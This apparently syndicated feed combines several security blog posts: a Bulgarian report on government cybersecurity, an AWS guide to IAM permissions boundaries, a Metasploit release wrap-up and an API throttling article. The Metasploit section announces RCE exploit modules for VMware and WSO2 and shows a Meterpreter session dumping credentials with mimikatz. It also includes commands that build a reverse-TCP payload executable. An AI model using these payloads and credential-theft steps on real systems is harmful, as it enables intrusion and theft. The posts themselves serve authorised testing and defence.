Състоянието на киберсигурността в администрацията и пътят напред

Post Syndicated from Bozho original https://blog.bozho.net/blog/3910

През седмицата темата с киберсигурността получи фокус покрай детайлите около атаката срещу пощите. В няколко интервюта описах общата картина, но ми се иска да направя малко по-пълно описание на това какво сме имали, какво сме направили за тези месеци и какво предстои.

Започвам със забележката, че ще използвам „киберсигурност“, макар че правилният термин в повечето случаи е „мрежова и информационна сигурност“. Правомощията на министъра на електронното управление са именно за „мрежова и информационна сигурност“ и то само в администрацията и част от доставчиците на съществени услуги (напр. в сектор енергетика). Български пощи не е в този обхват към момента.

Защитата на мрежовата и информационна сигурност е комплекс от технически и организационни мерки, които изискват добро планиране, приоритизиране, изпълнение и контрол в мащаба на държавната администрация (и в по-широк смисъл – на целия обществен сектор). Действаме с бързи стъпки, доколкото ни позволява наличният човешки ресурс.

1. Какво намерихме?

Към началото на мандата състоянието на информационните ресурси (т.е. хардуер, софтуер, мрежово оборудване, лицензи) беше силно незадоволително. Липсва адекватна, централизирана картина къде какво има, на какъв етап е от своя технологичен живот и какви са политиките по неговото подновяване. Има администрации с компютри на по 10 години, напр. Има системи без поддръжка (заради неплащани лицензи или по други причини). Всичко това са проблеми и за киберсигурността – в стари и излезли от поддръжка от производителите системи често има уязвимости. Всичко това го докладвах на Министерския съвет преди месец в рамките на годишния доклад за състоянието на информационните ресурси.

Преди 4 години от Демократична България публикувахме план за действие след срива на Търговския регистър. Половината от мерките са изпълнени, но със спорно качество – напр. регистърът на информационните ресурси е почти безполезен, резервните копия се правят централизирано от твърде малко администрации (с бавна скорост и липса на някои ключови функционалности), а на държавни облак му липсват важни процедури за присъединяване, вградени услуги за киберсигурност и др.

Базови добри практики във връзка с киберсигурността също не се прилагаха. Прости пароли, липса на двуфакторна автентикация, публично видими портове за отдалечен достъп (RDP), за портове за администрация на защитни стени и друг защитен софтуер – всичко това е вектор за атака. На много места липсва оперативно наблюдение на системите във връзка с оглед идентифициране на опити за първоначално проникване. Дори на местата, където има такова, не са свързани достатъчно много източници на информация, така че картината е непълна. Има и фрапиращи случаи, като една администрация, в която всички потребители са били администратори – за по-лесно. В пощите имаше не по-малко фрапиращи лоши практики.

Дирекцията за мрежова и информационна сигурност в Държавна агенция „Електронно управление“ е 16 души. Това е крайно недостатъчно за да покрие правомощията на агенцията (а вече – на министерството) по линия на киберсигурността. Капацитетът по останалите администрации в момента го установяваме в детайли, но общата картина не е розова – ИТ експертите в администрацията не са добре платени и правят всичко – от смяна на принтери, до конфигуриране на инструменти за киберсигурност.

Мога да изреждам още доста проблеми и примери, но от една страна е излишно, от друга страна не следва да разкривам детайли отвътре, от които някой може да се възползва (споделеното в горния параграф са неща, които в голяма степен са публично достъпни).

2. Какво свършихме

За този кратък период от време, в който преструктурираме една държавна агенция в две структури министерство и изпълнителна агенция, по линия на киберсигурността сме направили следното:

  • Изпратихме писма до всички институции да подобрят настройките на системите си, свързани с изпращане на имейли (т.е. потенциални фишинг атаки от тяхно име)
  • Сканирахме (вкл. с продължаващ абонамент за сканиране) всички администрации за публично достъпни системи, които не следва да бъдат достъпни. Напр. RDP (отдалечен достъп) – от около 60 отворени в началото, вече има само 10, като за тях предстоят санкции за ръководителите, тъй като това е нарушение на наредбата към Закона за киберсигурност
  • България стана 30-тата държава в света с абонамент за Have I Been Pwned – безплатна услуга, която ни дава информация за изтекли пароли за имейли на държавната администрация. Изтеклите пароли са от външни сайтове, но тъй като потребителите често използват една и съща парола, при информация за изтекла парола, трябва да бъдат принуждаване да сменят настоящата си
  • Блокирахме 48 хиляди IP адреса, свързани със злонамерена активност от Русия и Беларус (с първо писмо до интернет доставчиците – 45 хиляди и още 3 хиляди с последващо писмо)
  • Събрахме списък с доброволци и подготвихме договори за тестове за проникване (penetration tests) – първите такива тестове вече са започнали
  • Мигрирахме почти всички администрации към Защитения интернет възел на държавната администрация
  • В началото на войната спешно проверихме някои от най-критичните обекти и отправихме препоръки за повишаване на сигурността
  • Институтът за публична администрация, координирано с МЕУ, подготви информационен курс за защита от фишинг атаки
  • Подготвихме изменение на Закона за киберсигурност, за да включим вътре Български пощи и други публични предприятия, които в момента не се контролират от никоя институция по линия на мрежовата и информационна сигурност
  • Подготвихме изменения на Постановление на Министерския съвет за включване на Български пощи и БНБ в списъка със стратегически обекти, които обследва ДАНС
  • Увеличихме броя места за специалисти по киберсигурност в структурата на министерството (т.е. дирекцията няма да е вече само 16 души)

3. Какво предстои тази година

Немалка част от конкретните мерките, които предстои да вземем, ще бъдат класифицирана информация, тъй като пряко засягат националната сигурност. Но общите политики за повишаване на нивото на мрежова и информационна сигурност са не по-малко важни:

  • Приемане на всички подготвени нормативни изменения – в Закона за киберсигурност (за включване на пощите), в постановлението на Министерския съвет за стратегическите обекти
  • Приемане на Решение на Министерския съвет с правила за отговор на инциденти – най-важното при много от типовете атаки е бързата и адекватна реакция. Затова от най-високо ниво ще „спуснем“ какви да са стъпките, които всяка администрация да следва при инцидент.
  • Изменение на класификатора на длъжностите в администрацията и свързаните с него нормативни актове с цел повишаване на нивата на заплащане на специалисти по киберсигурност. Въвеждане и на позиция „стажант по киберсигурност“, така че да привличаме незавършили студенти с прилични заплати – тяхната експертиза вече е на достатъчно ниво, за да могат да бъдат полезни.
  • Подготовка и приемане на нова стратегия за киберсигурност
  • Структуриране на отношенията с частния сектор. Държавата няма достатъчно капацитет за оперативни наблюдения, триаж и отговор и трябва да бъде подпомагана от частния сектор. Трябва, обаче, да го направим по структуриран и адекватен начин, а не „всяка администрация сама да си преценя“ какво точно ѝ трябва и как да го получи
  • Транспониране на втората директива за мрежова и информационна сигурност веднага след като бъде приета на ниво Европейски съюз
  • Използване на максималните възможности на наличните системи за киберзащита (в момента много от тях не са адекватно настроени) и закупуване и инсталиране на нови
  • Обновяване на регистъра на информационните ресурси и поддържането му актуален, така че да могат да се правят реални политики за информационните ресурси (обновяване, спиране от експлоатация, управление, бюджетиране)
  • Регламентиране на централизирано закупуване на шаблонизирани решения за киберсигурност (няма смисъл всяка администрация да „открива топлата вода“)
  • Повишаване на нивото на киберсигурност в частния сектор в рамките на Програмата за научни изследвания, иновации и дигитализация за интелигентна трансформация
  • Засилване на ефективните проверки по Закона за киберсигурност – администрациите трябва да спазват поне действащата нормативна уредба, в която има немалко добри практики
  • Развиване на експертния капацитет на служителите в администрацията чрез обучения, съвместно с Института за публична администрация
  • Изграждане на център за оперативно наблюдение на мрежовата и информационна сигурност (Security operations center – SOC) в структурата на Министерство на електронното управление
  • Създаване на Националния компетеностен център по киберсигурност с цел стимулиране на екосистемата от експерти и организации – бизнес, университети, държава, неправителствен сектор
  • Засилен обмен на данни с партньорски държави, в т.ч. т.нар. индикатори на компрометиране (indicators of compromise). Т.е. когато един IP адрес опита да проникне в инфраструктура напр. в Естония, след неговото установяване в България да знаем за него и да го блокираме автоматично, преди изобщо да е опитал да „атакува“ и нас.

4. Заключение

Извън всички тези детайли, наличието на министерство означава, че тази политика е представена на масата на Министерския съвет. Което значително допринася за спазването първия принцип от цитирания по-горе план за действие, който бяхме предложили през 2018 г. – „Неделимост на киберустойчивостта от националната сигурност – политическото ниво трябва да е наясно, че срив, умишлен или не, в критични системи, се отразява директно на националната сигурност.“

Администрацията и службите за сигурност вече знаят, че киберсигурността е важна на политическо ниво. А това е важно за устойчивостта – спорадични мерки не вършат работа, ако у хората, които работят това ежедневно, няма увереност, че темата е важна на най-високо ниво.

Имаме много за наваксване. Рисковете са високи, ресурсите (човешки) са малко, а задачите са много и мащабни. Това прави нещата предизвикателни, но и мотивиращи. Сега е моментът да въведем трайна политика за киберустойчивост. Която включва много конкретика и технически детайли, но и много дългосрочни меки мерки за повишаване на капацитета.

Материалът Състоянието на киберсигурността в администрацията и пътят напред е публикуван за пръв път на БЛОГодаря.

Friday Squid Blogging: Squid Filmed Changing Color for Camouflage Purposes

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/friday-squid-blogging-squid-filmed-changing-color-for-camouflage-purposes.html

Video of oval squid (Sepioteuthis lessoniana) changing color in reaction to their background. The research paper claims this is the first time this has been documented.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

How to let builders create IAM resources while improving security and agility for your organization

Post Syndicated from Jeb Benson original https://aws.amazon.com/blogs/security/how-to-let-builders-create-iam-resources-while-improving-security-and-agility-for-your-organization/

Many organizations restrict permissions to create and manage AWS Identity and Access Management (IAM) resources to a group of privileged users or a central team. This post explains how you can safely grant these permissions to builders – the people who are developing, testing, launching, and managing cloud infrastructure – to speed up your development, increase your agility, and improve your application security. In addition, you will use an example application stack to see how IAM permissions boundaries can help establish a secure, yet agile work environment for builders.

An example application stack

Defining and creating IAM resources within the application stack allows your builders to craft policies and roles that grant least privilege to application resources. When builders are entitled to create IAM resources, it is straightforward for them to scope policies by referencing the application resources directly in the IAM policies in the same template.

To illustrate this point you will build a simple “hello world” serverless application. The application includes an AWS Step Functions state machine that, once executed, will invoke an AWS Lambda function. You will use this example application along with some IAM policies and IAM roles to illustrate how you can use permissions boundaries to safely grant IAM privileges to builders.

In this example AWS CloudFormation template, the Resource element in MyStateMachineExecutionRole, which is specified as the role for MyStateMachine, includes a reference to the Amazon Resource Name (ARN) of MyLambdaFunction. This is a great example of the principle of least privilege as MyStateMachine will only have permissions to invoke MyLambdaFunction. Making this association is straightforward because the IAM, Step Functions, and Lambda resources are defined together in the same template.

Example application template

AWSTemplateFormatVersion: 2010-09-09
Description: builder-application

Resources:

MyLambdaFunctionExecutionRole:
	Type: AWS::IAM::Role
    Properties:
		AssumeRolePolicyDocument:
			Version: 2012-10-17
			Statement:
				- Effect: Allow
				Principal:
				Service:
					- lambda.amazonaws.com
				Action: sts:AssumeRole
		Policies:
			- PolicyName: MyLambdaFunctionBasicExecutionPolicy
			PolicyDocument:
				Version: 2012-10-17
				Statement:
					- Effect: Allow
					Action:
						- logs:CreateLogGroup
						- logs:CreateLogStream
						- logs:PutLogEvents
					Resource: !Sub arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:*


MyLambdaFunction:
  	Type: AWS::Lambda::Function
	Properties:
		Runtime: python3.8
		Role: !GetAtt MyLambdaFunctionExecutionRole.Arn
		Handler: index.handler
		Code:
			ZipFile: |
				def handler(event, context):
					return("Hello Builder!")
		Timeout: 30

MyStateMachineExecutionRole:
	Type: AWS::IAM::Role
	Properties:
		AssumeRolePolicyDocument:
			Version: 2012-10-17
			Statement:
				- Effect: Allow
				Principal:
				Service:
					- states.amazonaws.com
				Action: sts:AssumeRole
		Policies:
			- PolicyName: StateMachineExecutionPolicy
			PolicyDocument:
				Version: 2012-10-17
				Statement:
					- Effect: Allow
					Action:
						- lambda:InvokeFunction
					Resource: !GetAtt MyLambdaFunction.Arn
      
MyStateMachine:
	Type: AWS::StepFunctions::StateMachine
	Properties:
		DefinitionString: !Sub |
          {
            "StartAt": "State1",
            "States": {
              "State1": {
                "Type": "Task",
                "Resource": "${MyLambdaFunction.Arn}",
                "End": true
              }
            }
          }
		RoleArn: !GetAtt MyStateMachineExecutionRole.Arn

MyLambdaFunctionPermission:
	Type: AWS::Lambda::Permission
	Properties:
	  Action: lambda:InvokeFunction
	  FunctionName: !Ref MyLambdaFunction
	  Principal: states.amazonaws.com
	  SourceArn: !Ref MyStateMachine

In an organization that uses a centralized approach to IAM management, a builder would not be able to deploy this example application because the roles the builders are granted prohibit IAM actions related to creating and managing roles and policies. This creates three key challenges for the organization:

  1. Builders often rely on a security or cloud team to create IAM resources. This approach adds an additional burden to that team which slows down development while builders wait for the roles and policies to be created, and encourages the team to grant overly-broad permissions so that they don’t have to be involved in the precise details of changes on a daily basis.
  2. IAM resources must be created before the rest of the stack, which makes it much more difficult to create least-privilege policies and roles.
  3. The code for IAM and application infrastructure is maintained separately, which requires extra coordination when creating and updating workloads.

Removing these challenges can simplify your cloud development, lower the amount of overhead and coordination required across your organization, and improve your security posture. Further, reducing the burden on your security team can free up time for them to focus on enforcing additional data perimeters and implementing best practices from the security pillar of the AWS Well-Architected Framework.

Use permissions boundaries on application roles created by builders

So how can your organization shift to a decentralized approach to IAM management and allow builders to safely create application IAM policies and roles, as well as prevent builders from being able to escalate their own privileges? This is a scenario where permissions boundaries should be used.

Permissions boundaries allow an IAM policy to be attached to an IAM role to enforce limits on the permissions that role can be granted. The permissions boundary itself does not grant any permissions – it’s just a guardrail that defines the maximum entitlements. You can create a builder policy that requires a specified permissions boundary be attached to any application roles that a builder creates, effectively setting the maximum permissions on any role that a builder can generate. The permissions for any application roles created will be the intersection of the application policies and the permissions boundary associated with the application role. Said another way, a permission granted in the application policy must also be granted in the permissions boundary, or else it will be implicitly denied according to the policy evaluation logic.

The set of permissions required for builder roles (assumed by actual people or CI/CD pipelines) to deploy infrastructure and develop applications are different than those required for application roles (assumed by workloads/applications) to execute within applications and workflows. If you think of permissions in terms of control plane actions involved in creating, deleting, and modifying resources, versus data plane actions needed to execute the daily business of those resources, builder and application roles typically operate more on the control plane and data plane, respectively. While permissions policies attached to application roles should be tightly scoped to include only those actions needed to perform a specific task, policies for permissions boundaries should be highly reusable and include a broad set of permissions across a suite of services that a variety of applications might need. In addition, it is a best practice to not share roles between humans and services. To summarize, policies for builder and application roles should be designed with the following criteria in mind:

Policy Role Permissions Scope Reusability User
builder builder control plane broad high human
application application data plane specific low service
application-boundary application data plane broad high application role

Following the steps in this section, you will create:

  1. A builder policy that grants builders permissions for services needed to deploy and manage applications, and to create and manage IAM policies and roles for those applications.
  2. An application-boundary policy that defines the extent of the permissions any application role created by a builder can have.
  3. A builder role with the builder policy attached as the permissions policy, the application-boundary policy attached as a permissions boundary, and a trust policy that allows anyone in the account to assume the builder role.

Create the builder IAM resources

In this first procedure, you will use CloudFormation to create the builder and application-boundary IAM policies, and the builder IAM role.

To launch the builder IAM stack

  1. Open a Linux terminal with the AWS Command Line Interface (CLI) installed and AWS credentials configured for a user or role that has permissions to create IAM resources.
  2. Launch the builder IAM stack by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-iam \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-iam.json \
    --capabilities CAPABILITY_NAMED_IAM

The builder policy you created uses paths to organize IAM policies and roles into isolated “spaces” that can be specified as resource constraints. It also requires roles to have a permissions boundary attached. This approach helps manage role delegation and prevents builders from escalating their privileges or modifying roles that may be used by other teams.

Note that paths can only be added to IAM resources using the AWS CLI or APIs – not via the console. If this is an issue, another option is to specify that policies and roles start with a specific phrase, for example “application-roles-*”. Just be sure to use different phrases for the builder, application, and permissions boundaries resources to maintain isolation and prevent builders from being able to escalate their privileges.

The builder policy also includes some basic control plane permissions, while the application-boundary policy you created includes permissions used across a suite of services that a typical serverless application might need. However, both policies are only meant to demonstrate the concepts in this blog post. In practice, you will need to create policies that more accurately reflect the permissions needed by builder and application roles in your organization. See the example-permissions-boundaries repository on the AWS Samples GitHub site for more ideas.

Use the builder role to launch an application stack

In this section you will assume the builder role and verify that you can launch the application stack, including the application roles, but only if the required permissions boundary and path are specified.

To test launching a stack that creates application roles

  1. Assume the builder role by using the following set of commands (copy and paste into the terminal as a single block). This step uses the jq program, which is available in most operating system package repositories.
    export AWS_DEFAULT_OUTPUT="json"; \
    role=builder; \
    aws_role=$(aws iam get-role --role-name $role); \
    role_arn=$(echo $aws_role|jq '.Role.Arn'|tr -d '"'); \
    aws_credentials=$(aws sts assume-role --role-arn $role_arn --role-session-name builder-test); \
    export AWS_ACCESS_KEY_ID=$(echo $aws_credentials|jq '.Credentials.AccessKeyId'|tr -d '"'); \
    export AWS_SECRET_ACCESS_KEY=$(echo $aws_credentials|jq '.Credentials.SecretAccessKey'|tr -d '"'); \
    export AWS_SESSION_TOKEN=$(echo $aws_credentials|jq '.Credentials.SessionToken'|tr -d '"')

    You will use this role for all of the following procedures up until the “Clean up” section. If, during the course of this exercise, you get an error that “The security token included in the request is expired”, create a new terminal and repeat this step to get a fresh set of credentials.

    The trust policy for the builder role allows any principal in the account to assume it. You can use a combination of the Principal and Condition attributes to further reduce its scope. Normally builder roles are assumed directly via federation or AWS SSO.

  2. Check that the you have now assumed the builder role by using the following command:
    aws sts get-caller-identity

  3. Launch the example application stack by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-1.yml \
    --capabilities CAPABILITY_NAMED_IAM

  4. If things are set up correctly, the stack will fail. To confirm, check the StackStatus by using the following command – it should show ROLLBACK_IN_PROGRESS or ROLLBACK_COMPLETE.
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

  5. The stack failed to create because the builder role you assumed does not have permissions to create the two application roles without specifying the /application_roles/ path and attaching a permissions boundary with /permissions_boundaries/ in the path. To see the details, use the following command:
    aws cloudformation describe-stack-events \
    --stack-name builder-application | jq '.StackEvents[] | select(.ResourceStatus=="CREATE_FAILED") | .ResourceStatusReason'

  6. If the original stack did not create successfully, you will not be able to update it, so you will need to delete it instead by using the following command:
    aws cloudformation delete-stack \
    --stack-name builder-application

  7. Launch a new stack with an updated template that includes the required path and permissions boundary by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-2.yml \
    --capabilities CAPABILITY_NAMED_IAM

  8. After a few minutes, confirm the stack was successfully created by using the following command and verifying StackStatus is CREATE_COMPLETE:
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

To verify the application is working

  1. Start an execution of the state machine and verify the application is working by using the following commands. Run them one at a time to allow the execution to finish.
    state_machine_arn=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyStateMachine") | .PhysicalResourceId' | tr -d '"')
    
    execution_arn=$(aws stepfunctions start-execution --state-machine-arn $state_machine_arn | jq '.executionArn' | tr -d '"')
    
    aws stepfunctions describe-execution --execution-arn $execution_arn | jq '.output'

    If the output is “\”Hello Builder!\””, then the application is working.

Test that a builder can’t escalate their privileges

In this section, you will test scenarios where a builder attempts, intentionally or not, to escalate their privileges by first modifying the policies attached to the builder role and then extending the permissions of an application role beyond the permissions boundary.

To test updating a builder policy attached to the builder role

  1. Create an environment variable for your AWS account number, which will be used in several of the steps below, using the following command:
    export AWS_ACCOUNT=$(aws sts get-caller-identity | jq '.Account' | tr -d '"')

  2. Retrieve the builder policy and save it to a file by using the following command:
    aws iam get-policy-version \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/builder_policies/builder \
    --version-id v1 | jq '.PolicyVersion.Document' > builder-policy.json

  3. Add the following JSON block to the “Statement” array in the builder-policy.json file and save the changes.
    {
    	"Sid": "SneakyBuilder",
    	"Effect": "Allow",
    	"Action": "*",
    	"Resource": "*"
    }

  4. Try to update the builder policy and set it as the default version by using the following command:
    aws iam create-policy-version \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/builder_policies/builder \
    --policy-document file://builder-policy.json \
    --set-as-default

    You should get an AccessDenied error because the builder role can only modify policies in the /application_policies/ space.

To test adding an application policy to the builder role

  1. Save a copy of builder-policy.json as a new file called sneaky-policy.json using the following command:
    cp builder-policy.json sneaky-policy.json

  2. Create the new policy using the following command:
    aws iam create-policy \
    --policy-name sneaky-policy \
    --path /application_policies/ \
    --policy-document file://sneaky-policy.json

    You should not get an error in this step because you are creating a new policy that complies with the resource constraint for the statement that includes the iam:CreatePolicy permission in the builder policy. But, it’s just a policy for now – it can’t have any effect unless attached to a role.

  3. Now try to attach this new policy to the builder role by using the following command:
    aws iam attach-role-policy \
    --role-name builder \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/application_policies/sneaky-policy

    You should get an error because you’re attempting to attach a policy to a role that’s not in the /application-roles/ space, in this case the builder role.

To test modifying an application role with actions outside the permissions boundary

In this procedure, you will attempt to escalate the privileges of the MyLambdaFunctionExecutionRole by adding an action (s3:CreateBucket) that is outside of the permissions boundary attached to the role and then attempting to execute that action when MyLambdaFunction is invoked.

  1. Update the builder-application stack by using the following command:
    aws cloudformation update-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-3.yml \
    --capabilities CAPABILITY_NAMED_IAM

  2. After a few minutes, confirm the stack was successfully updated by using the following command and verifying StackStatus is UPDATE_COMPLETE:
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

  3. Start an execution of the state machine and verify the result by using the following commands. Run them one at a time to allow the execution to finish.
    state_machine_arn=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyStateMachine") | .PhysicalResourceId' | tr -d '"')
    
    execution_arn=$(aws stepfunctions start-execution --state-machine-arn $state_machine_arn | jq '.executionArn' | tr -d '"')
    
    aws stepfunctions describe-execution --execution-arn $execution_arn | jq '.status'

    The status should be FAILED. Remember – the effective permissions for any application roles will be the intersection of the attached permissions policies and the permissions boundary. Thus, this execution failed because even though you were able to modify the inline policy of the Lambda function to add s3:CreateBucket, since that action is not allowed in the application-boundary policy attached to the Lambda as a permissions boundary, the request to create an S3 bucket was denied.

  4. Get the name of the latest log stream by using the following commands:
    lambda_function_name=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyLambdaFunction") | .PhysicalResourceId' | tr -d '"')
    
    aws logs describe-log-streams \
    --log-group-name /aws/lambda/$lambda_function_name \
    --order-by LastEventTime \
    --descending | jq -r '.logStreams[0].logStreamName'

  5. To verify the actual error was due to a lack of permissions, get the event message by using the following command, replacing <value> with the value of the log stream copied in the step above. If using a bash terminal, you will need to escape any dollar signs in <value> with a backslash character:
    aws logs get-log-events \
    --log-group-name /aws/lambda/$lambda_function_name \
    --log-stream-name <value> | jq '.events[] | select (.message | contains("[ERROR]"))'

    The error should read [ERROR] ClientError: An error occurred (AccessDenied) when calling the CreateBucket operation: Access Denied, which confirms that the permissions boundary prevented you from escalating your privileges as a builder via an application role.

You have now verified that you can safely allow builders to create IAM policies and roles!

Clean up

After you have finished testing, clean up the resources created in this example. Because the builder role does not have permissions to delete builder policies and roles, you will need to assume a different role that can manage IAM resources to complete step 3 below. If you create a new terminal session, make sure the AWS_ACCOUNT environment variable is set.

To clean up

  1. Delete the builder-application stack by using the following command:
    aws cloudformation delete-stack --stack-name builder-application

  2. Delete the sneaky-policy by using the following command:
    aws iam delete-policy \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/application_policies/sneaky-policy

  3. Delete the builder-iam stack by using the following command:
    aws cloudformation delete-stack --stack-name builder-iam

Service control policies

Permissions boundaries are applied to individual IAM users or roles within an account. If your organization has multiple accounts, you must create and maintain these boundaries in each account for each individual user or role. But what if you’d like to apply a subset of these rules or others across some or all of your accounts? In this case, you could use service control policies (SCPs), which are a feature of AWS Organizations, to provide central control over the maximum available permissions for multiple accounts in your organization. By organizing accounts into organizational units (OUs), which are groups of accounts that serve an application or service, you can apply service control policies (SCPs) to create targeted governance boundaries for your OUs. To learn more about creating SCPs, see Get more out of service control policies in a multi-account environment in the AWS Security Blog.

Additional tools

Creating and managing tightly scoped policies and roles is an ongoing process that requires a lot of thought and attention to detail. AWS IAM enables fine-grained access control to AWS services, and permissions boundaries are an advanced feature. There is no substitute for actual testing like you performed in the “Test that a builder can’t escalate their privileges” section above, however you can also use the IAM Policy Simulator as a tool to test policies and determine whether or not specific actions are allowed for a given user, group, or role. Additional tools you can use to create, audit, and update IAM policies include:

  • Access Advisor – to review when services and actions were last accessed.
  • Access Analyzer – to help identify resources in your organization and accounts that are shared with an external identity, validate IAM policies against policy grammar and best practices, and generate IAM policies based on access activity in your AWS CloudTrail logs.
  • AWS Cloud Development Kit (CDK) – has built-in convenience methods to help you follow best practices, including the ability to generate least-privilege policies for cloud applications with a single line of code.
  • Open Source tools like cfn-nag and cdk-nag – to inspect CloudFormation templates and CDK applications for patterns that may indicate insecure infrastructure, for example IAM policies that are too permissive.

Conclusion

In this post, you learned how to put policies and guardrails in place that will allow your organization to grant IAM permissions to builders. These changes will enable your builders to develop and deploy cloud infrastructure and applications more rapidly, and will help strengthen your organization’s security culture by extending the responsibility to a broader group. To learn more about creating, testing, and refining IAM policies and permissions boundaries, see Creating IAM policies, Testing IAM policies, and Refining permissions using access information in the IAM User Guide, and IAM policy types: How and when to use them in the AWS Security Blog.

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/

VMware Workspace ONE Access RCE

Metasploit Wrap-Up

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates – Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

Enhancements and features (2)

  • #16445 from dwelch-r7 – The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:
use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler
  • #16462 from bcoles – Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

  • #16526 from jheysel-r7 – The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
  • #16530 from sjanusz-r7 – This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Throttling a tiered, multi-tenant REST API at scale using API Gateway: Part 1

Post Syndicated from Nick Choi original https://aws.amazon.com/blogs/architecture/throttling-a-tiered-multi-tenant-rest-api-at-scale-using-api-gateway-part-1/

Many software-as-a-service (SaaS) providers adopt throttling as a common technique to protect a distributed system from spikes of inbound traffic that might compromise reliability, reduce throughput, or increase operational cost. Multi-tenant SaaS systems have an additional concern of fairness; excessive traffic from one tenant needs to be selectively throttled without impacting the experience of other tenants. This is also known as “the noisy neighbor” problem. AWS itself enforces some combination of throttling and quota limits on nearly all its own service APIs. SaaS providers building on AWS should design and implement throttling strategies in all of their APIs as well.

In this two-part blog series, we will explore tiering and throttling strategies for multi-tenant REST APIs and review tenant isolation models with hands-on sample code. In part 1, we will look at why a tiering and throttling strategy is needed and show how Amazon API Gateway can help by showing sample code. In part 2, we will dive deeper into tenant isolation models as well as considerations for production.

We selected Amazon API Gateway for this architecture since it is a fully managed service that helps developers to create, publish, maintain, monitor, and secure APIs. First, let’s focus on how Amazon API Gateway can be used to throttle REST APIs with fine granularity using Usage Plans and API Keys. Usage Plans define the thresholds beyond which throttling should occur. They also enable quotas, which sets a maximum usage per a day, week, or month. API Keys are identifiers for distinguishing traffic and determining which Usage Plans to apply for each request. We limit the scope of our discussion to REST APIs because other protocols that API Gateway supports — WebSocket APIs and HTTP APIs — have different throttling mechanisms that do not employ Usage Plans or API Keys.

SaaS providers must balance minimizing cost to serve and providing consistent quality of service for all tenants. They also need to ensure one tenant’s activity does not affect the other tenants’ experience. Throttling and quotas are a key aspect of a tiering strategy and important for protecting your service at any scale. In practice, this impact of throttling polices and quota management is continuously monitored and evaluated as the tenant composition and behavior evolve over time.

Architecture Overview

Figure 1. Cloud Architecture of the sample code.

Figure 1 – Architecture of the sample code

